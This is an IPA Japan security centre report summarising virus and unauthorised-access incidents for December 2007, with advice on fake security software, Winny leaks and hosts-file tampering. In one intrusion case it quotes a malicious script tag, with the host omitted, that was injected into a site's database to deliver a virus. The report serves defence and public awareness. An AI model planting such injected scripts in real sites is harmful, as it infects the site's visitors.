Information-technology
Promotion Agency,
Japan
$BK\J8$X(B
IPA

TOP|Aplication|Contact us|Sitemap


Information-technology Promotion Agency, Japan
-japanese charactor-






IT Security Center

The Information-technology SEcurity Center (ISEC) is the center for promoting information security in Japan.









Japanese




Activities




Information Service Activities






Security Software Development Activities






CRYPTREC






IT SecurityAssurance







Organization







PGP key







RFCs







Mission Statement







Links







About IPA/ISEC







IPA TOP>IT Security Center Japanese TOP>IT Security Center English TOP>information




Computer Virus / Unauthorized Computer Access Incident Report [Summary]


January 28, 2008
IT Security Center
Information-technology Promotion Agency, Japan (IPA)

This is a summary of computer virus/unauthorized computer access incident reports for December, 2007 and its annual review of 2007 compiled by IPA.

 

I. Reminder for the Month:

“You may have been deceived by those messages…?”

- Be cautious with the hard selling of phony security measures software!! -

 

Relatively huge number of consultations relevant to hard selling of phony security measures software from users is rushed to IPA every month. Of some consultation is: a user easily installed the said security measures software as the product name is written in Roman characters so that the user seemed it is natural. Hard selling of phony security measures software itself is not a new engineering; number of users could get rid of facing damages as the messages being displayed on and the product names are mostly written in English. However, recently, such messages/product names tending to be written in Japanese with Roman characters such as (i) VirusuWadame (No viruses), (ii) KyoiKanshi (Threat monitoring) and (iii) Kansen Nashi (No infection), etc. are observed. Since they do not appear to be big difference with typical security measures software at a glance, most of users undoubtedly installed them and face damages in the event.

(1) What is the hard selling of phony security measures software…?

Have you ever had one of following messages such as “Virus is developed from your computer”, “Your computer is in error state”? Then you might have been recommended to “purchase the security measures software” shown on the screen to resolve that problems? In most of cases, this is a malicious activity which displays phony messages as if there is some problem and attempts to have users pay for the security measures software. Even you pay for it, none of problem is resolved as there is no problem originally in your computer.

For instance, some messages and images shown in the Chart 1-1 may be displayed when you click an image on the banner ad at the top of homepage (image ad on homepage) as if there actually are problems in your computer.

An instance of phony message

Chart 1-1: An instance of phony message

Then it prompts you to click the button shown at the chart 1-1 (b) if you wish to know further details of the problems. To tell you the truth, it induces you to download phony security measures software when you click the button. The phony software often functions differently with typical legitimate security measures software. The “phony security measures software” being installed in your computer continually displays message on the screen to prompts you to purchase the software over and over until you settle it with your credit card.

(2) Measures

The “phony security measures software” is often priced relatively cheap. Naturally, some users prefer to pay for it as the shortcut in case you do not know how to erase such message and do not want to be annoyed by the message which prompts you to purchase the software. Be cautious! Even you pay for it, such messages will not stop urge you to purchase the security measures software! You should never, ever pay for it. You should not click any buttons on the screen hastily even though the message shown in the Chart 1-1 is shown while you were browsing some homepages. The best measure you have to take is to immediately close the browser and do not go forward. Generally, legitimate manufacturer and provider of security measures software do not send such message shown in the Chart 1-1 one-sidedly.

In case you'd installed the “security measures software” incidentally and there is no way to erase the message from the screen, the “phony security measures software” should be removed from the “Program additions/deletions” field by clicking the “Start” button at the bottom part of the left-hand side corner and selecting “Control Panel” there.

(3) Just in case…

Some computer may appear lack of stability with the following symptoms: the computer cannot connect to the Internet or it processes slower than before, etc. When such symptom is appeared, be sure to restore the following systems. Though the symptom is not remedied, the last resort you have to take is to initialize your computer.

(a) Restoring the current system to the normal state with the system restoration function

Windows automatically selects arbitrary day to store the system status of the day in case the computer unstably behaves and/or shows significant troubles for use. Windows furnishes “system restoration” function to restore the computer to the normal state based on the information previously stored. The arbitrary day when the system state is stored can also be configured by the user.

Please refer to the Microsoft's homepage to restore the normal state using Windows “system restoration” function. Please also be noted if you'd installed some application software, conducted updates, etc. somewhere in between the arbitrary day selected to today, you are to redo them after the system is thoroughly restored as the previously installed patches, etc. will not be applied. However, documents created from the arbitrary day to today, in- and out-bound e-mails, URLs you'd accessed and favorite URLs you'd listed are maintained.

“System Restoration”

http://www.microsoft.com/windowsxp/using/setup/support/sysrestore.mspx

(b) Initialization of computer

This is the work to get back your computer to the initial state when purchased. As for the actual procedures, please follow to the “getting back the computer to the initial state when purchased” column on the instruction booklet attached to your computer upon purchased. Be sure to back-up important data, information to the outside media, etc. before you initiate initialization work.

*IPA will not bear responsibility to the troubles, losses or damages caused by the said initialization work conducted by you. The work shall be processed with your calm judgment under your fully responsibility.

<Reference>

IPA – Seven Virus Requirements for Computer Users (in Japanese)

http://www.ipa.go.jp/security/antivirus/7kajonew.html

IPA – Five Anti-spyware Requirements for Computer Users (in Japanese)

http://www.ipa.go.jp/security/antivirus/spyware5kajyou.html

 

II. Reporting Status for Computer Virus further details, please refer to the

   Attachment 1

The detection number [1] of virus in December was about 0.34M : decreased about 40% from 0.60M reported in November. In addition, the reported number [2] for December was 2,239: it was also decreased 4.8% from 2,351 the number in November.


[1]Detection number:

Reported virus counts (cumulative) found by a filer.

[2]Reported number:

Virus counts are aggregated: viruses of same type and variants reported on the same day are counted as one case number regardless how many viruses or the actual number of viruses is found by the same filer on the same day. In December, the reported number was 2,239: aggregated virus detection number was about 0.34M.

The worst detection number of virus was W32/Netsky with about 0.30M , W32/Stration with about 0.023M and W32/Mytob with about 0.011 subsequently followed.

Chart 2-1

Chart 2-2

Note) Numbers in the parenthesis are the Numbers for previous month.

 

III. Reporting Status for Unauthorized Computer Access (includes Consultations) Please refer to the Attachment 2 –

Report for unauthorized computer access and status of consultation

 

July

Aug.

Sept.

Oct.

Nov.

Dec.

Total for Reported (a)

10

16

10

10

15

14

 

Damaged (b)

8

13

8

9

11

7

Not Damaged (c)

2

3

2

1

4

7

Total for Consultation (d)

25

23

27

37

31

21

 

Damaged (e)

11

15

12

22

17

16

Not Damaged (f)

14

8

15

15

14

5

Grand Total (a + d)

35

39

37

47

46

35

 

Damaged (b + e)

19

28

20

31

28

23

Not Damaged (c + f)

16

11

17

16

18

12

(1) Reporting Status for Unauthorized Computer Access

Reported number for November was 14: of 7 was the number actually damaged .

(2) Accepting Status for Consultations relevant to Unauthorized Computer Access

Consultation number relevant to unauthorized computer access was 21: of 16 (of 2 was also counted as reported number) was the actual number that some sort of damage was reported.

(3) Status of Damage

The breakdown of reported damage was: intrusion with 4 , DoS attack with 1 and others (damaged) with 2 . The damages relevant to intrusion were mainly caused by the alteration of web contents with 4: of 2 were really harmful that some traps were embedded which automatically jump to the malicious site which inducing users download virus when he/she simply accessed to a certain site. In addition, locating malicious contents to exploit for phishing with 1 was also counted.

The cause of intrusion was: insufficient configuration with 1; as for the other 3 cases, we could not identify them, however, it can be assumed that leaving vulnerability either in the server OS or in applications are the major causes. As for the causes for the others (damaged), such damage that the user's avatar and/or virtual money to be used on a RPG (role playing game) was missing was counted as 1 case.

*Phishing:   One of malicious engineering which induces users to fabulous web pages spoofing to be actual business such as legitimate financial institution, etc. to exploit users' IDs and passwords.

(4) Damage Instances:

[Intrusion]

(i) Web site was altered…

<Instance>

-   A general user who browsed this business's site communicated that “virus alerts

     were appeared by anti-virus software as soon as the user accessed the site”.

-   Study was conducted and realized that number of fields within a database was

     being altered by following code ? <script src=” http://(omitted).net/0.js

     ></script> ? .

-   Because of this script, a user automatically downloaded virus when he/she simply

     browsed the site.

[Others (Damaged)]

(ii) Items to be used on online games were missing…

<Instance>

-   Because of home computer's failure, I'd enjoyed playing RPG (role playing games) at

     a comic café.

-   When I re-logged in a couple days later, my avatar was differently located where I

     previously logged out.

-   I felt it suspicious and study was conducted, accordingly. Then I have realized that

     some arms for my avatar and virtual money to be used for online games were

     missing.

-   According to my game buddies, they'd seen someone was logged in to be myself

     while I was away from the games.

 

IV. Accepting Status of Consultation

The gross number of the consultation in December was 389. Of the consultation relevant to “ One-click Billing Fraud ” was significantly decreased with 43 (November: 264). This may be the cause that an offender with the one-click billing fraud was arrested in the end of November last year. As for the others, the consultation relevant to “ Winny ” with 19 (November: 31), the consultation relevant to “ Hard selling of phony security measures software ” with 11 (November: 14), etc. were also realized.

Movement in entire number of consultation accepted by IPA /method

 

July

Aug.

Sept.

Oct.

Nov.

Dec.

Total

1162

1013

910

1128

911

389

 

Automatic Response System

694

593

544

669

520

222

Telephone

403

374

310

397

337

109

e-mail

64

43

55

57

52

56

Fax, Others

1

3

1

5

2

2

*IPA consults/advises for computer viruses/unauthorized computer accesses as well as the other information concerning overall security issues

Mail: ?????????? for virus issues, ????????????for crack issues.

Tel.: +81-3-5978-7509 (24-hour automatic response)

Fax: +81-3-5978-7518 (24-hour automatic response)

*The Total case number includes the number in Consultation (d) column of the Chart in the “IV. Reported Status for Unauthorized Computer Access” and “V. Accepting Status of Consultation”.

*”Automatic Response System”:   Accepted numbers by automatic response
*“Telephone”:                           Accepted numbers by the Security Center personnel

 

<Reference>

Shift in Number of Consultation relevant to One-click Billing Fraud

The major consultation instances are as follows.

(i) The data stored within a privately owned computer was deviated on a Winny network…

Consultation:

I am using Winny with a privately owned computer. Materials for my work are also stored in that computer. One day, I have find out such posting on one e-bulletin board saying that the data stored within a computer was being deviated. I have checked and realized that the said data was deviated from my computer. My computer was probably infected by virus so that the data was deviated. Could you tell how do I respond?

Response:

It is highly probable that the data to be used for work is deviated as well , be sure to conduct following procedures:

(1) Reports to the parties involved

Be sure to communicate with the parties involved with the work including your supervisor immediately. Do not think of fixing it personally: be sure to follow to the instructions provided by the emergency response team (department) in your firm.

(2) Handling the computer

First of all, the computer in which information was deviated should be disconnected from the Internet. Do not remove Winny or delete files in that computer at this stage as they are necessary to identify data being deviated.

For the other procedures, please refer to the following URLs.

<Reference>

IPA – How to Prevent Information Leakage by Winny (in Japanese)

http://www.ipa.go.jp/security/topics/20060310_winny.html

IPA – Responding Tips for Information Leakage Accident (in Japanese)

http://www.ipa.go.jp/security/awareness/johorouei/

 

(ii) Being Infected by Virus…?

Consultation:

I have been having following symptoms a couple of weeks ago. My computer may be infected by virus.

-   I'd attempted to update my computer, but the relevant pages are not appeared.

-   Anti-virus software cannot be downloaded.

-   Vendors for anti-virus software cannot be browsed (the other sites are appeared).

-   I have tried to conduct fee on-line virus scan, I was automatically sent to

     unrelated shopping site or the computer displays “unable to display your requested

     pages.”, etc.

Response:

Study was conducted and it was realized that the traps which disabling to access to legitimate sites were embedded (host file alteration). It is highly probable that your computer was infected by virus so that we attempted system restoration, but the function itself was already disabled. Since the damage caused by virus was widely spreaded over, we encourage you to initialize your computer. Herewith, it is very difficult to restore once a computer is infected by virus. Accordingly, it is important to conduct preventive measures on a routine basis.

<Reference>

IPA – Seven Virus Requirements for Computer Users (in Japanese)

http://www.ipa.go.jp/security/antivirus/7kajonew.html

 

V. Accessing Status Captured by the Internet Monitoring (TALOT2”) in December

According to the Internet Monitoring (TALOT2), the total of unwanted (one-sided) number of access in December 2007 was 218,942 for 10 monitoring points. That is, the number of access was 706 from 235 source addresses/monitoring point/day.

Since each monitoring environment for the TALOT2 is nearly equal to the general connection environment used for the Internet; it can be considered that the same amount of unwanted (one-sided) access can be monitored for the general Internet users' connection environment. In another word, your computer is being accessed from 235 unknown source addresses in average/day or you are being accessed about 3 times from one source address which considered unauthorized.

Chart 5-1 Unwanted (One-sided) Number of Access and Source Number of Access/Monitoring Point/Day

The Chart 5-1 shows the unwanted (one-sided) number of access and the unwanted (one-sided) source number of access/monitoring point/day from January to December 2007. According to this chart, both the unwanted (one-sided) accesses in December were decreased than the ones in November and showed lowest figures ever as the number of access/source number of access/day in 2007. However, it seemed that the access contents are entirely stabilized.

Both unwanted (one-sided) accessing status/day in single month in 2007 were tending moderately decreased from June regardless of the type of access (see the Chart 5-2).

Chart 5-2: Shift in Access Type (Destination)/Monitoring Point/Day

Chart 5-3: Unwanted (One-sided) Number of Access and Source Number of Access/Monitoring Point/Day from June 2004 to December 2007

It is not for sure why number of access/source number of access was decreased. The cause may be:

•  Significant infection damage by worm and/or virus targeting Windows vulnerability

    was lowered;

•  Effects of anti-bot measures provided by the CCC ( Cyber Clean Center ), the

    collaborative project in between MIC (Ministry of Internal Affairs and

    Communications) and METI (Ministry of Economy, Trade and Industry).

•  Security measures is improved as those computers used by individual users and

    businesses are replaced by newer ones or are employed more sophisticated OSs .

As for (1) above, it can also be seen in the reported numbers of virus and detection number of virus in the computer virus report are decreased; however, anti-spam measures and anti-virus measures by respective providers are mainly worked out to prevent from enlarging infection damage.

<Referential Information>

Reporting Status of Computer Virus for 2007

http://www.ipa.go.jp/security/english/virus/press/200712/virus2007.html

The (2) above seems effective for those seemed from the access by bot virus. In the CCC, distribution of bot removal tools is committed and virus alert mails are sent to those users whose computers may have been infected by bot virus with the collaboration of ISPs (Internet Service Providers).

<Referential Information>

CCC ( Cyber Clean Center ), the Collaboration project in between MIC and METI (in Japanese/partially in English)

https://www.ccc.go.jp/en_index.html

Bot Removal Procedures (in Japanese)

https://www.ccc.go.jp/flow/index.html

Alerting Activities (in Japanese)

https://www.ccc.go.jp/activity/index.html

Brochure for Anti-bot Measures (PDF file)

http://www.ipa.go.jp/security/english/virus/antivirus/pdf/Bot_measures_eng.pdf

As for (3) above, the newer OS (Windows Vista) was released in January 2007: we assume when individual and business users replace newer OSs and/or systems, bot virus, etc. may be discarded along with legacy computers and/or systems if worms and viruses may have been infected while users do not know.

In addition, newer OSs and systems furnish up to dated anti-virus software as default even it is a limited time offer: users do not want to miss this superb opportunity that the software provides users latest security!

In relation to the above information, please also refer to the following site for further details.

Attachment3_Observation Status Captured by the Internet Monitoring (TALOT2)

http://www.ipa.go.jp/security/english/virus/press/200712/TALOT200712.html

 


“Various Statistics Information Provided by Other Organizations/Vendors are Publicized in the Following Sites”


@police:      http://www.cyberpolice.go.jp/english/
Trendmicro: http://us.trendmicro.com/us/home/index.html
McAfee:      http://www.mcafee.com/us/

 

- Attachment 3 Observation Status by Internet Monitoring System (TALOT2)

- Attachment 4 “Report Status for Computer Virus 2007”

- Attachment 5 “Report Status for Unauthorized Computer Access 2007”

   


Contact
IT Security Center, Information-technology Promotion Agency, Japan (IPA/ISEC)
Tel:+81-3-5978-7527

Fax:+81-3-5978-7518

E-mail:






Term of Use


Copyright(c) Information-technology Promotion Agency, Japan. All rights reserved 2005